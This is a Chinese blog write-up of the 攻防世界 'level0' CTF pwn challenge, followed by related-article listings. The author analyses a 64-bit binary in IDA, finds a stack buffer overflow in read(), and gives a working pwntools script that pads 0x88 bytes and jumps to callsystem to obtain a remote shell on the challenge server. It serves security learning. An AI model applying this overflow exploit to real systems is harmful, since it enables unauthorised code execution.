攻防世界PWN-level0

最新推荐文章于 2024-02-20 13:34:06 发布
最新推荐文章于 2024-02-20 13:34:06 发布
阅读量2.4k 收藏 9
点赞数 1
分类专栏: ctf 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Deeeelete/article/details/109652012
版权

题目:level0

在这里插入图片描述

老规矩先进PE

在这里插入图片描述
查看是64位程序,可以考虑直接IDA莽,也可以进checksec查一下详细参数

在这里插入图片描述
比较脆,无PIE且没了栈保护(Stack-canary),容易GOT改写( RELRO)


简单运行一遍,发现是hello word

在这里插入图片描述




进64位IDA

鼠标悬停在main函数上按f5反编译

在这里插入图片描述
查看源码:

在这里插入图片描述


过于简单,没啥可用的信息,双击它return的脆弱函数进一步查看

int __cdecl main(int argc, const char **argv, const char **envp)
{
  write(1, "Hello, World\n", 0xDuLL);
  return vulnerable_function();
}

查函数源码

在这里插入图片描述
函数return了一个 read(0, &buf, 0x200uLL);也就是回了一个read操作,大小为0x200uLL也就是200个空间,那是不是也就意味着只要我们把这200个空间打满,然后追加上对应的内容,溢出的部分就能被程序read到。

但目前我们并不清楚着200个空间具体是多大,但既然是在read一个&buf,因此双击进入变量查看

在这里插入图片描述
在这里插入图片描述

于是为了便于审计我们摘出这三个地址:

0000000000000080是buf地址
0000000000000000是s地址
0000000000000008是read地址

从s到buf是多少个地址,0000000000000080 - 0000000000000000个地址(注意是16进制),也就是0x80个地址,这是buf到s的。

从read到s多少个地址,0000000000000008 - 0000000000000000个地址,也就是0x08个地址,这是从s到r的

两者相加,一共0x88个地址,把这些个地址用字符堵死,后续就能伪造执行的read



问题回到read,既然知道现在我们能通过溢出让系统read,但它到底要read个啥?自问自答一波肯定是flag,但程序中好像也没有直接能在system中cat flag的函数,那就尝试找一个类似的函数。

看到左侧有一个callsystem函数

在这里插入图片描述
双击进去后发现函数能拿到bin/sh的权限,针不戳,于是去Exports窗口找该函数的地址

在这里插入图片描述
完整地址是:0000000000400596 ,这里其实只取后八位就可以:00400596,也就是0x00400596

用脚本把前面0x88个空间打死然后把这个函数地址用p64(0x00400596)拼接上,就可以让read拿到我们的bin/sh权限了。

构造脚本:

from pwn import *
r = remote("220.249.52.133", 51852)
payload = 'A'*0x88 + p64(0x00400596) #堵死0x88个空间然后拼接上callsystem函数地址
r.sendline(payload)
r.interactive()

出flag

在这里插入图片描述

Deeeelete
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
攻防世界(pwn篇)---level0
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 1425
攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢
c语言格式化字符漏洞,格式化字符串漏洞题目练习
weixin_30111277的博客
05-22 881
整合一下最近做的格式化字符串题目的练习,把wp给写一下,方便对总结对这个漏洞的利用套路和技巧。inndy_echo保护和arch[*] '/media/psf/mypwn2/buuctf/inndy_echo/echo'Arch: i386-32-littleRELRO: Partial RELROStack: No canary foundNX: NX enabl...
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1303
学习pwn开始,慢慢来不要急
PWN-题解
2301_79215333的博客
02-20 644
检查文件,64位,开启NX保护拖入IDA打开,查看主函数双击查看可以看到buf的长度只有0x80,即可用栈大小只有108字节,但是read()并没有限制输入,显然存在栈溢出漏洞。在Functions window可以看到有一个callsystem()函数,按F5反汇编可以看到这是一个系统调用,存在system(“/bin/sh”)即使用栈溢出令返回地址指向该函数地址即可。
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2515
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 我什至开发了一些脚本和工具来帮助我获得更好的体验。 现在,到2020年,您将拥有一个更高效的pwn开发环境。 您可以在上面的GIF中瞥一眼最终环境。 在本文中,我将向您展示如何构建该环境。 Arch Linux 如果您想拥有一个ELF ,首先需要一个Linux发行版。 我使用 ,该具有强大的来安装各种软件,以下所有部分均基于此。 如果您使用其他Linux发行版甚至是macOS,则可能需要找到在计算机上安装某些软件包的方法。 但是以下配置仍然对您有用。 或者,如果您不想通过命令行安装Linux发行,则可以只切换到或 。 您可能会发现许多文章仍在教您如何使用yaou
0ctf-2017-pwn-char
02-05
2017年0ctf的pwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:https://blog.csdn.net/A951860555/article/details/112849849
初学pwn-攻防世界(level0)
天柱的博客
08-27 965
初学pwn-writeUp 攻防世界的第三道题目,level0。 首先还是先创建场景,使用nc进入远端,发现输出了一个Hello,World,之后什么都没有了,使用ls也没有反应,说明这需要我们获取shell了。 下载文件,先用checksec查看一下 这里简单介绍一些checksec这个工具: 1、Relro:No Relro(重定位表只读)   Relocation Read Only, 重定位表只读。重定位表即.got 和 .plt 两个表。   RELRO会有No RELRO、Partial RE
攻防世界 level0
qq_62539372的博客
03-21 572
常规操作: 可以看到no canary found 没有栈保护机制 可以利用栈溢出pwn掉程序(NX,Canary,Relro,PIE保护机制的讲解文末聊) 64位放进ida64分析: 主函数的内容 :write()函数(write函数和read函数文末聊) 返回值是vulnerable_founction函数里的内容 点开看一下 返回值是read()函数的内容 有个栈 看一下 .........
攻防世界level0 + (Jarvis Oj)(Pwn) level1
qq_44832048的博客
07-24 1914
攻防世界level0 将文件在ida中打开, 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互,双击进去查看,, 无参数传入,buf长度为0x80,即0x80h填充满,之后跟上地址就可以实现任意跳转。查找字符串 这是 vulnerable_function 函数,可以在栈上写0x200个字节,或许我们可以进行溢出,覆盖掉返回地址...
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat
最新发布
04-17
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat,文章pwn - 零基础ROP之Android ARM 32位篇(新修订)https://blog.csdn.net/tabactivity/article/details/137780714 全部资料文件。 0基础pwn
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
攻防世界pwn新手练习(level0)
BurYiA的博客
10-24 949
level0 老规矩哦,我们先checksec一下,收集一下信息 64位程序,开了NX,没啥说的,还在接受范围内,运行一下试试 唔,没啥东西,继续IDA吧。(╯‵□′)╯︵┴─┴ emmm,主函数倒是挺简单的,就一行打印,一行输入 但…不知你们有米有发现有个很奇怪的函数名,我们悄悄的瞅一瞅 果然不对劲,首先它的名字中有个system(手动加粗),这个是什么东西嘞,简单的来说,它拥有系统的最高...
攻防世界-level0
qq_45771413的博客
04-22 610
探路 只有NX 试运行: 平平无奇 IDA 找到了读取越界的地方: buf长度80,但是读取了512 解题不相关但是想记一下怕又忘了:寻找buf的地址, ALT+T 查找字符串,选中最后的显示所有 学长support: 栈是存储局部变量的 使用完需要恢复成上一个函数的栈 结构如下: 数据 栈底地址(谁的?不吞掉后果如何) rip:返回的地址 写脚本的目的:把buf占满,吞掉rbp,修改rip的地址,跳转到指定地址 做到这其实卡壳了,其实还有shift+f12这个老朋友○| ̄|_ 敏感权
攻防世界PWN题——level0
Greic的博客
12-01 3466
嘿嘿,又是我,我又肥来了。今天带来的是攻防世界第三题的writeup,这次话不多说,我们直接进入主题。 无论怎么样,pwn题前两步少不了——查看文件类型和保护类型: 64位linux操作系统,只开了NX保护,再打开IDA看看。 将Hello,World显示到屏幕上,再点开函数看看: 可以看到,buf是分配了80个字节(从rbp-80-rbp+0),但是read函数读入了0x200字节,因此,这里明显有栈溢出,再点开buff看看: 可以看到,我们只需要将buf和s覆盖,也就...
【愚公系列】2022年01月 攻防世界-简单题-PWN-001(level0)
热门推荐
时光隧道
01-17 3万+
文章目录一、level0二、答题步骤1.获取在线场景2.查壳3.IDA总结 一、level0 题目链接:https://adworld.xctf.org.cn/task/task_list?type=pwn&number=2&grade=0 二、答题步骤 1.获取在线场景 2.查壳 对下载文件进行查壳,命令如下 file level0 checksec --file=level0 分析文件,小端程序(LSB),栈不可执行。 3.IDA 使用IDA对文件进行反汇编 第一步:首先找到ma
攻防世界pwn level0做题思路
nzw1134864657的博客
07-24 1839
先看看题目的各种保护机制 栈不可以执行,我们用IDA打开看看 写进一个hello world的字符串,然后执行vulnerable_function()函数 跟进函数里查看 这里我不是特别理解,writeup上是这样写的 “这是 vulnerable_function 函数,可以在栈上写0x200个字节,或许我们可以进行溢出,覆盖掉返回地址,劫持程序执行流,执行我们想执行的方法。通常我们的目...
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Deeeelete

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值